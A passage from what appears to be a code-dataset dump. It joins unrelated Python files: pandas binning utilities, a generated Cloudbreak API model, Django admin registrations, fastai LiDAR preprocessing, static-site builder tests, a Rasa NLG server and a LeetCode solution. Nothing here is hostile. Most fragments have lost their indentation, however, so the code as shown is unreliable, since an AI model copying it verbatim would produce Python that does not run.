width = 10 ** (power - power_offset)
temp = list(
pd.interval_range(
start=(min(unique_values) // width) * width, # 5278 -> 5000
end=max(unique_values) + width, # 6001 -> 7000
freq=width,
closed="left",
)
)
logging.debug(f"{sturges} vs {len(temp)} ({dist(len(temp), sturges)})")
# if new dist is now greater than last, use last
if prev and dist(len(temp), sturges) > dist(len(prev), sturges):
return prev
prev = temp
raise TenPowException()
def is_discrete_by_binning(num: int) -> bool:
"""If pd.cut() places multiple values in the same bin, then it's not discrete."""
print(pd.cut(unique_values, num, include_lowest=True, right=False))
return (
len(pd.cut(unique_values, num, include_lowest=True, right=False)) <= num
)
# get a sorted unique list w/o nan values
unique_values, is_numerical = analyze_data_type(df[name].tolist())
# Numerical
if is_numerical:
# use default # of bins
if not num_bins:
catbins = get_cut(sturges_rule())
# use 10-pow calculated bins
elif num_bins == -1:
try:
catbins = get_10pow()
is_10pow = True # only mark true if this algo works
except TenPowException:
catbins = get_cut(sturges_rule())
# use given # of bins
else:
catbins = get_cut(num_bins)
# Did the binning make this data effectively discrete?
is_discrete = is_discrete_by_binning(len(catbins))
# Categorical
else:
catbins = unique_values
is_discrete = True
logging.info(f"Cat-Bins: {catbins}")
return Dim(name, catbins, is_10pow, is_discrete)
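# Usage sketch (illustrative column and values):
# df = pd.DataFrame({"height": [1.2, 3.4, 2.8, 5.0, 4.1, 0.7]})
# dim = Dim.from_pandas_df("height", df)                     # Sturges-rule bins
# dim_10pow = Dim.from_pandas_df("height", df, num_bins=-1)  # 10^N binning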
class DimSelection:
"""A pairing of a Dim and a category/bin."""
def __init__(self, dim: Dim, catbin: CatBin, is_x: bool) -> None:
self.dim = dim
self.catbin = catbin
self.is_x = is_x
def __eq__(self, other: object) -> bool:
return (
isinstance(other, DimSelection)
and self.dim == other.dim
and self.catbin == other.catbin
and self.is_x == other.is_x
)
def get_pandas_query(self) -> str:
"""Get the pandas-style query string."""
if self.dim.is_numerical:
return (
f"{self.dim.name} {'>=' if self.catbin.closed_left else '>'} " # type: ignore[union-attr]
f"{self.catbin.left} and "
f"{self.dim.name} {'<=' if self.catbin.closed_right else '<'} "
f"{self.catbin.right}"
)
return f'{self.dim.name} == "{self.catbin}"'
def __repr__(self) -> str:
"""Get repr string."""
return f"DimSelection({self.dim=}, {self.catbin=}, {self.is_x=})"
class Intersection:
"""Wraps the intersection of n dimensions.."""
def __init__(self, dimselections: Optional[List[DimSelection]] = None) -> None:
if not dimselections:
dimselections = []
self.dimselections = dimselections
def deepcopy_add_dimselection(self, dimselection: DimSelection) -> "Intersection":
"""Deep-copy self then add the new DimSelection to a new Intersection."""
new = deepcopy(self)
new.dimselections.append(dimselection)
return new
def __eq__(self, other: object) -> bool:
return (
isinstance(other, Intersection)
and self.dimselections == other.dimselections
)
def __repr__(self) -> str:
return f"Intersection({self.dimselections})"
# ---------------------------------------------------------------------------------------
def super_len(dims: List[Dim]) -> int:
num = 1
for dim in dims:
num *= len(dim.catbins)
return num
class IntersectionMatrixBuildException(Exception):
""" "Raise when the IntersectionMatrix cannot be built correctly."""
class IntersectionMatrix:
"""Contains the 2D matrix of category combinations (intersections of multiple dimensions)."""
def __init__(self, x_dims: List[Dim], y_dims: List[Dim]) -> None:
self.matrix = self._build(x_dims, y_dims)
@staticmethod
def _build_list(x_dims: List[Dim], y_dims: List[Dim]) -> List[Intersection]:
"""Build out the 1D Intersection list."""
the_list: List[Intersection] = []
class DimXY(TypedDict): # pylint:disable=missing-class-docstring
dim: Dim
is_x: bool
def _recurse_build(
dims_togo: List[DimXY],
unfinished_intersection: Optional[Intersection] = None,
) -> None:
if not unfinished_intersection:
unfinished_intersection = Intersection()
if not dims_togo:
# intersection IS finished
the_list.append(unfinished_intersection)
return
for catbin in dims_togo[0]["dim"].catbins:
_recurse_build(
dims_togo[1:],
unfinished_intersection.deepcopy_add_dimselection(
DimSelection(dims_togo[0]["dim"], catbin, dims_togo[0]["is_x"])
),
)
y_dimxys: List[DimXY] = [{"dim": d, "is_x": False} for d in y_dims]
x_dimxys: List[DimXY] = [{"dim": d, "is_x": True} for d in x_dims]
_recurse_build(y_dimxys + x_dimxys)
return the_list
@staticmethod
def _build(x_dims: List[Dim], y_dims: List[Dim]) -> List[List[Intersection]]:
"""Build out the 2D Intersection matrix."""
# pylint:disable=invalid-name
x, y = 0, 0
x_range, y_range = range(super_len(x_dims)), range(super_len(y_dims))
matrix: List[List[Intersection]] = [
[Intersection() for x in x_range] for y in y_range
]
for intersection in IntersectionMatrix._build_list(x_dims, y_dims):
if x == len(matrix[0]):
x = 0
y += 1
matrix[y][x] = intersection
x += 1
if x != len(matrix[0]) and y != len(matrix) - 1:
raise IntersectionMatrixBuildException(
f"{len(matrix[0])}x{len(matrix)} matrix did not complete, "
f"last element: ({x=},{y=})"
)
return matrix
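# Minimal self-check sketch (illustrative data; the dims and expected shapes are
# examples, not part of the original module).
if __name__ == "__main__":
    _x = Dim("color", ["Red", "Yellow", "Green"])
    _y = Dim("size", ["Small", "Large"])
    _matrix = IntersectionMatrix([_x], [_y]).matrix
    print(len(_matrix), "rows x", len(_matrix[0]), "cols")    # 2 rows x 3 cols
    print(_matrix[0][0].dimselections[0].get_pandas_query())  # size == "Small"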
| StarcoderdataPython |
88147 | <gh_stars>0
# coding: utf-8
"""
Cloudbreak API
    Cloudbreak is a powerful left surf break over a coral reef, a mile off the southwest of the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. It abstracts the provisioning and eases the management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API that allows you to spin up Hadoop clusters of arbitrary sizes on different cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud provider APIs (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class FlexUsageControllerJson(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'guid': 'str',
'instance_id': 'str',
'region': 'str',
'provider': 'str',
'smart_sense_id': 'str',
'user_name': 'str'
}
attribute_map = {
'guid': 'guid',
'instance_id': 'instanceId',
'region': 'region',
'provider': 'provider',
'smart_sense_id': 'smartSenseId',
'user_name': 'userName'
}
def __init__(self, guid=None, instance_id=None, region=None, provider=None, smart_sense_id=None, user_name=None):
"""
FlexUsageControllerJson - a model defined in Swagger
"""
self._guid = None
self._instance_id = None
self._region = None
self._provider = None
self._smart_sense_id = None
self._user_name = None
if guid is not None:
self.guid = guid
if instance_id is not None:
self.instance_id = instance_id
if region is not None:
self.region = region
if provider is not None:
self.provider = provider
if smart_sense_id is not None:
self.smart_sense_id = smart_sense_id
if user_name is not None:
self.user_name = user_name
@property
def guid(self):
"""
Gets the guid of this FlexUsageControllerJson.
:return: The guid of this FlexUsageControllerJson.
:rtype: str
"""
return self._guid
@guid.setter
def guid(self, guid):
"""
Sets the guid of this FlexUsageControllerJson.
:param guid: The guid of this FlexUsageControllerJson.
:type: str
"""
self._guid = guid
@property
def instance_id(self):
"""
Gets the instance_id of this FlexUsageControllerJson.
:return: The instance_id of this FlexUsageControllerJson.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""
Sets the instance_id of this FlexUsageControllerJson.
:param instance_id: The instance_id of this FlexUsageControllerJson.
:type: str
"""
self._instance_id = instance_id
@property
def region(self):
"""
Gets the region of this FlexUsageControllerJson.
:return: The region of this FlexUsageControllerJson.
:rtype: str
"""
return self._region
@region.setter
def region(self, region):
"""
Sets the region of this FlexUsageControllerJson.
:param region: The region of this FlexUsageControllerJson.
:type: str
"""
self._region = region
@property
def provider(self):
"""
Gets the provider of this FlexUsageControllerJson.
:return: The provider of this FlexUsageControllerJson.
:rtype: str
"""
return self._provider
@provider.setter
def provider(self, provider):
"""
Sets the provider of this FlexUsageControllerJson.
:param provider: The provider of this FlexUsageControllerJson.
:type: str
"""
self._provider = provider
@property
def smart_sense_id(self):
"""
Gets the smart_sense_id of this FlexUsageControllerJson.
:return: The smart_sense_id of this FlexUsageControllerJson.
:rtype: str
"""
return self._smart_sense_id
@smart_sense_id.setter
def smart_sense_id(self, smart_sense_id):
"""
Sets the smart_sense_id of this FlexUsageControllerJson.
:param smart_sense_id: The smart_sense_id of this FlexUsageControllerJson.
:type: str
"""
self._smart_sense_id = smart_sense_id
@property
def user_name(self):
"""
Gets the user_name of this FlexUsageControllerJson.
:return: The user_name of this FlexUsageControllerJson.
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""
Sets the user_name of this FlexUsageControllerJson.
:param user_name: The user_name of this FlexUsageControllerJson.
:type: str
"""
self._user_name = user_name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, FlexUsageControllerJson):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| StarcoderdataPython |
1778776 | <reponame>p01arst0rm/twelete
__version__ = '1.1.0'
__author__ = 'polar'
__license__ = 'MIT'
from Twelete.main import twelete
| StarcoderdataPython |
3293975 | from django.contrib import admin
from .models import FirstAnswerReview,FirstQuestionReview
from .models import LateAnswerReview
# from .models import QuestionEdit
from .models import CloseQuestionVotes, ReviewQuestionReOpenVotes
from .models import ReviewCloseVotes,ReOpenQuestionVotes,QuestionEditVotes
from .models import ReviewQuestionEdit,LowQualityPostsCheck,ReviewLowQualityPosts
from .models import ReviewFlagPost,FlagComment,ReviewFlagComment,FlagPost
# admin.site.register(QuestionEdit)
admin.site.register(FirstAnswerReview)
admin.site.register(FirstQuestionReview)
admin.site.register(LateAnswerReview)
admin.site.register(CloseQuestionVotes)
admin.site.register(ReviewCloseVotes)
admin.site.register(ReOpenQuestionVotes)
admin.site.register(ReviewQuestionReOpenVotes)
admin.site.register(QuestionEditVotes)
admin.site.register(ReviewQuestionEdit)
admin.site.register(LowQualityPostsCheck)
admin.site.register(ReviewLowQualityPosts)
admin.site.register(FlagComment)
admin.site.register(ReviewFlagPost)
admin.site.register(ReviewFlagComment)
admin.site.register(FlagPost)
 | StarcoderdataPython |
1657034 | <reponame>claresloggett/ponder-gittest
'''
Utilities for testing.
'''
import pandas as pd
def parse_test_df(f):
'''
Given a filehandle or filename for a CSV file,
return the dataframe, assuming our standard dtypes
for standard column names.
'''
df = pd.read_csv(f)
df['Boolean'] = df['Boolean'].astype('bool')
df['Binary'] = pd.Categorical(df['Binary'], categories=['No','Yes'])
df['Ordinal'] = pd.Categorical(df['Ordinal'],
categories=['Small','Medium','Large'], ordered=True)
df['Nominal'] = pd.Categorical(df['Nominal'],
categories=['Red','Yellow','Green'])
df['Nominal2'] = pd.Categorical(df['Nominal2'],
categories=['Negative','PositiveA','PositiveB'])
return df
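# Usage sketch (illustrative file path):
# df = parse_test_df('tests/data/test_table.csv')
# df.dtypes  # Boolean -> bool; Binary, Ordinal, Nominal, Nominal2 -> category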
| StarcoderdataPython |
3248886 | <gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/02_tabular.preprocessing.ipynb (unless otherwise specified).
__all__ = ['EnvecoPreprocessor', 'process_one']
# Cell
from fastai.tabular.all import *
from fastai.data.all import *
from fastai.vision.data import get_grid
from ..data.las import *
from ..data.image import *
import matplotlib.patches as mpl_patches
from typing import Tuple
from fastai.metrics import *
# Cell
from tqdm import tqdm
tqdm.pandas()
class EnvecoPreprocessor():
"Needs a bit refactoring"
def __init__(self, train_path, valid_path, test_path, **kwargs):
self.train_df = pd.read_csv(train_path)
self.train_df = self.train_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.valid_df = pd.read_csv(valid_path)
self.valid_df = self.valid_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.test_df = pd.read_csv(test_path)
self.test_df = self.test_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.train_df['is_valid'] = 0
self.valid_df['is_valid'] = 1
self.train_val_df = pd.concat((self.train_df, self.valid_df))
def preprocess_lidar(self, target_col, path, min_h:float=1.5, mask_plot:bool=True, normalize:bool=True,
log_y:bool=False, save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess data and return (train_val, test) -tuple. Optionally log-transform target column with np.log1p"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
feature_cols = point_cloud_metric_cols
trainval[point_cloud_metric_cols] = trainval.progress_apply(lambda row: point_cloud_metrics(f'{path}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
test[point_cloud_metric_cols] = test.progress_apply(lambda row: point_cloud_metrics(f'{path}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/las_trainval.csv', index=False)
test.to_csv(f'{save_path}/las_test.csv', index=False)
with open(f'{save_path}/las_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_las(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed las data"
trainval = pd.read_csv(f'{path}/las_trainval.csv')
test = pd.read_csv(f'{path}/las_test.csv')
with open(f'{path}/las_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
def preprocess_image(self, target_col, path, radius:int=31, mask_plot:bool=True, normalize:bool=True,
log_y:bool=False, save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess dataframes and return (train_val, test) -tuple"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
#feature_cols = image_metric_cols
trainval_feats = []
for s in tqdm(trainval.sampleplotid.unique()):
feats = process_image_features(f'{path}/{s}.tif', mask_plot, radius)
feats['sampleplotid'] = s
trainval_feats.append(feats)
trainval_feats = pd.DataFrame(trainval_feats)
test_feats = []
for s in tqdm(test.sampleplotid.unique()):
feats = process_image_features(f'{path}/{s}.tif', mask_plot, radius)
feats['sampleplotid'] = s
test_feats.append(feats)
test_feats = pd.DataFrame(test_feats)
trainval = trainval.merge(trainval_feats, on='sampleplotid', how='left')
test = test.merge(test_feats, on='sampleplotid', how='left')
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
feature_cols = [k for k in trainval_feats.columns if k != 'sampleplotid']
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/image_trainval.csv', index=False)
test.to_csv(f'{save_path}/image_test.csv', index=False)
with open(f'{save_path}/image_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_image(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed image data"
trainval = pd.read_csv(f'{path}/image_trainval.csv')
test = pd.read_csv(f'{path}/image_test.csv')
with open(f'{path}/image_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
def preprocess(self, target_col, path, lidar_pref, image_pref, min_h:float=1.5,
mask_plot:bool=True, normalize:bool=True, log_y:bool=False,
save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess dataframes and return (train_val, test) -tuple"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
feature_cols = point_cloud_metric_cols
trainval[point_cloud_metric_cols] = trainval.progress_apply(lambda row: point_cloud_metrics(f'{path}/{lidar_pref}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
test[point_cloud_metric_cols] = test.progress_apply(lambda row: point_cloud_metrics(f'{path}/{lidar_pref}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
trainval_feats = []
for s in tqdm(trainval.sampleplotid.unique()):
feats = process_image_features(f'{path}/{image_pref}/{s}.tif', mask_plot, radius=31)
feats['sampleplotid'] = s
trainval_feats.append(feats)
trainval_feats = pd.DataFrame(trainval_feats)
test_feats = []
for s in tqdm(test.sampleplotid.unique()):
feats = process_image_features(f'{path}/{image_pref}/{s}.tif', mask_plot, radius=31)
feats['sampleplotid'] = s
test_feats.append(feats)
test_feats = pd.DataFrame(test_feats)
trainval = trainval.merge(trainval_feats, on='sampleplotid', how='left')
test = test.merge(test_feats, on='sampleplotid', how='left')
feature_cols = feature_cols + [c for c in trainval_feats.columns if c != 'sampleplotid']
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/las_image_trainval.csv', index=False)
test.to_csv(f'{save_path}/las_image_test.csv', index=False)
with open(f'{save_path}/las_image_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_las_image(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed image data"
trainval = pd.read_csv(f'{path}/las_image_trainval.csv')
test = pd.read_csv(f'{path}/las_image_test.csv')
with open(f'{path}/las_image_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
# Cell
def process_one(path, plot_x:float=None, plot_y:float=None, mask_plot=True, radius=9) -> pd.Series:
"Utility for predicting single point cloud"
metrics = point_cloud_metrics(path, plot_x, plot_y, mask_plot, radius)
df = pd.DataFrame(columns=point_cloud_metric_cols, data=[metrics])
return df.iloc[0] | StarcoderdataPython |
160486 | <filename>tests/0800_builder/06_build.py
import io
import importlib
import os
import shutil
import pytest
from optimus.setup_project import setup_project
from optimus.conf.loader import import_pages_module
from optimus.pages.builder import PageBuilder
from optimus.assets.registry import register_assets
def DummyFilter(content):
return "DummyFilter: {}".format(content)
@pytest.mark.parametrize(
"sample_fixture_name,attempted_destinations",
[
(
"basic_template",
# Relative destination path from dev build dir
[
"index.html",
],
),
(
"basic2_template",
[
"index.html",
"sub/foo.html",
"sub/bar.html",
],
),
(
"i18n_template",
[
"index.html",
"index_fr_FR.html",
],
),
],
)
def test_build_item(
minimal_basic_settings,
fixtures_settings,
reset_syspath,
temp_builds_dir,
sample_fixture_name,
attempted_destinations,
):
"""
Build each page
This will only work for sample fixtures that use the same layout as
'basic_template'.
Also we build in production mode so webassets apply minification; this is
required since in development mode webassets use a hash on every asset
file that we can't rely on and which would break the built file comparison.
"""
basepath = temp_builds_dir.join("builder_build_item_{}".format(sample_fixture_name))
projectdir = os.path.join(basepath.strpath, sample_fixture_name)
attempts_dir = os.path.join(
fixtures_settings.fixtures_path, "builds", sample_fixture_name
)
# Copy sample from fixtures dir
templatedir = os.path.join(fixtures_settings.fixtures_path, sample_fixture_name)
shutil.copytree(templatedir, projectdir)
# Setup project
setup_project(projectdir, "dummy_value")
# Get basic sample settings
settings = minimal_basic_settings(projectdir)
# Enable production mode for webassets without url expire in a custom
# cache dir, so we have stable asset filenames for comparison
cache_dir = os.path.join(projectdir, "webassets-cache")
os.makedirs(cache_dir)
settings.DEBUG = False
settings.WEBASSETS_CACHE = cache_dir
settings.WEBASSETS_URLEXPIRE = False
# Define a dummy filter to test filter registration and usage
settings.JINJA_FILTERS = {"dummy_filter": DummyFilter}
# Init webassets and builder
assets_env = register_assets(settings)
builder = PageBuilder(settings, assets_env=assets_env)
pages_map = import_pages_module(settings.PAGES_MAP, basedir=projectdir)
# NOTE: We need to force reloading the import, otherwise the previously imported
# settings with different values are still re-used
pages_map = importlib.reload(pages_map)
# Collect the templates found for each defined page view
buildeds = []
for pageview in pages_map.PAGES:
found = builder.build_item(pageview)
buildeds.append(found)
# Add absolute build dir to each attempted relative path
assert buildeds == [
os.path.join(settings.PUBLISH_DIR, path) for path in attempted_destinations
]
# Check every built destination exists
for path in attempted_destinations:
dest_path = os.path.join(settings.PUBLISH_DIR, path)
attempt_path = os.path.join(attempts_dir, path)
# Open builded file
with io.open(dest_path, "r") as destfp:
built = destfp.read()
# Write the attempted file from the built file
# This is only temporary stuff to enable when writing a new test or
# updating an existing one
# with io.open(attempt_path, 'w') as writefp:
# writefp.write(built)
# Open attempted file from 'builds'
with io.open(attempt_path, "r") as attemptfp:
attempted = attemptfp.read()
assert built == attempted
# Cleanup sys.path for next tests
reset_syspath(projectdir)
@pytest.mark.parametrize(
"sample_fixture_name,attempted_destinations",
[
(
"basic_template",
# Relative destination path from dev build dir
[
"index.html",
],
),
(
"basic2_template",
[
"index.html",
"sub/foo.html",
"sub/bar.html",
],
),
(
"i18n_template",
[
"index.html",
"index_fr_FR.html",
],
),
],
)
def test_build_bulk(
minimal_basic_settings,
fixtures_settings,
reset_syspath,
temp_builds_dir,
sample_fixture_name,
attempted_destinations,
):
"""
Build all pages in one bulk action
Since the 'build_item' test already compares built files, we don't do it again
here; we just check the returned paths
"""
basepath = temp_builds_dir.join("builder_build_bulk_{}".format(sample_fixture_name))
projectdir = os.path.join(basepath.strpath, sample_fixture_name)
# Copy sample from fixtures dir
templatedir = os.path.join(fixtures_settings.fixtures_path, sample_fixture_name)
shutil.copytree(templatedir, projectdir)
# Setup project
setup_project(projectdir, "dummy_value")
# Get basic sample settings
settings = minimal_basic_settings(projectdir)
# Define a dummy filter to test filter registration and usage
settings.JINJA_FILTERS = {"dummy_filter": DummyFilter}
# Init webassets and builder
assets_env = register_assets(settings)
builder = PageBuilder(settings, assets_env=assets_env)
pages_map = import_pages_module(settings.PAGES_MAP, basedir=projectdir)
# NOTE: We need to force reloading the import, otherwise the previously imported
# settings with different values are still re-used
pages_map = importlib.reload(pages_map)
# Collect the templates found for each defined page view
buildeds = builder.build_bulk(pages_map.PAGES)
# Check every attempted file has been created (promise)
assert buildeds == [
os.path.join(settings.PUBLISH_DIR, path) for path in attempted_destinations
]
# Check every promised built file exists
for dest in attempted_destinations:
absdest = os.path.join(settings.PUBLISH_DIR, dest)
assert os.path.exists(absdest) is True
# Cleanup sys.path for next tests
reset_syspath(projectdir)
| StarcoderdataPython |
3215981 | import argparse
import os
from decouple import config
from rasa.core.nlg import TemplatedNaturalLanguageGenerator, NaturalLanguageGenerator
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic, response
from rasa.constants import ENV_SANIC_BACKLOG, DEFAULT_SANIC_WORKERS
import logging
from rasa.shared.core.domain import Domain
from rasa.shared.core.trackers import DialogueStateTracker
import file_watcher
logger = logging.getLogger(__name__)
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S'
)
DEFAULT_SERVER_PORT = 5065
RASA_ENVIRONMENT = config("RASA_ENVIRONMENT", default="DEV")
class NlgServer:
def __init__(
self,
domain_path="./data",
port=DEFAULT_SERVER_PORT,
workers=1,
nlg_class=TemplatedNaturalLanguageGenerator
):
self.domain_path = domain_path
self.domain = self._get_domain()
if isinstance(nlg_class, str):
self.nlg_class = NaturalLanguageGenerator.create(EndpointConfig(type=nlg_class), self.domain)
else:
self.nlg_class = nlg_class(self.domain.responses)
self.port = port
self.workers = workers
if RASA_ENVIRONMENT == "DEV":
file_watcher.start(self)
def _get_domain(self):
logger.info("Starting to load domain")
try:
domain = Domain.load(self.domain_path)
logger.info(f"Successfully loaded domain with {len(domain.responses)} responses")
except Exception as e:
domain = Domain.empty()
logger.error(e)
return domain
def load_domain(self, debug_mode=None):
try:
self.domain = self._get_domain()
self.nlg_class.responses = self.domain.responses
except Exception as e:
logger.error(e)
debug_dict = {
"text": f"Loaded {len(self.nlg_class.responses)} responses",
"domain_path": self.domain_path
}
if debug_mode == "title":
debug_dict["responses"] = list(self.domain.responses.keys())
elif debug_mode == "full":
debug_dict["responses"] = self.domain.responses
return debug_dict
async def generate_response(self, nlg_call):
kwargs = nlg_call.get("arguments", {})
response_arg = nlg_call.get("response")
sender_id = nlg_call.get("tracker", {}).get("sender_id")
events = nlg_call.get("tracker", {}).get("events")
tracker = DialogueStateTracker.from_dict(sender_id, events, self.domain.slots)
channel_name = nlg_call.get("channel").get("name")
return await self.nlg_class.generate(response_arg, tracker, channel_name, **kwargs)
def run_server(self):
app = Sanic(__name__)
@app.route("/nlg", methods=["POST"])
async def nlg(request):
nlg_call = request.json
bot_response = await self.generate_response(nlg_call)
return response.json(bot_response)
if RASA_ENVIRONMENT == "DEV":
@app.route("/reload", methods=["GET"])
async def reload(request):
debug_response = self.load_domain(request.args.get("show_responses"))
return response.json(debug_response)
app.run(
host="0.0.0.0",
port=self.port,
workers=self.workers,
backlog=int(os.environ.get(ENV_SANIC_BACKLOG, "100")),
)
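# Example request body for the /nlg endpoint (illustrative sketch only; the keys
# mirror what generate_response() reads above, but the exact tracker payload Rasa
# sends may contain additional fields, and the response/channel names are placeholders):
EXAMPLE_NLG_REQUEST = {
    "response": "utter_greet",
    "arguments": {},
    "tracker": {"sender_id": "user_1", "events": []},
    "channel": {"name": "rest"},
}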
def create_argument_parser():
parser = argparse.ArgumentParser(description="starts the nlg endpoint")
parser.add_argument(
"-p",
"--port",
default=DEFAULT_SERVER_PORT,
type=int,
help="port to run the server at",
)
parser.add_argument(
"-w",
"--workers",
default=DEFAULT_SANIC_WORKERS,
type=int,
help="Number of processes to spin up",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default="./data",
help="path of the domain file to load utterances from",
)
parser.add_argument(
"--nlg",
type=str,
default=TemplatedNaturalLanguageGenerator,
help="custom nlg class path",
)
return parser
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
arg_parser = create_argument_parser()
cmdline_args = arg_parser.parse_args()
NlgServer(
cmdline_args.domain,
cmdline_args.port,
cmdline_args.workers,
cmdline_args.nlg
).run_server()
| StarcoderdataPython |
3295373 | <filename>easy/Merge Sorted Array/solution.py
# Time complexity: O(m+n)
# Approach: Imputing values from end
from typing import List  # provided implicitly on LeetCode; imported here so the file runs standalone


class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if not n:
return
i, j, k = m-1, n-1, m+n-1
while j>=0:
if i>=0 and nums1[i]>nums2[j]:
nums1[k] = nums1[i]
i-=1
else:
nums1[k] = nums2[j]
j-=1
k-=1
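# Example (illustrative): merging [2, 5, 6] into [1, 2, 3, 0, 0, 0] with m=3, n=3
# leaves nums1 as [1, 2, 2, 3, 5, 6]:
# nums1 = [1, 2, 3, 0, 0, 0]
# Solution().merge(nums1, 3, [2, 5, 6], 3)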
| StarcoderdataPython |
1604201 | <gh_stars>0
import json
import os
from datetime import datetime
from requests_oauthlib import OAuth1Session
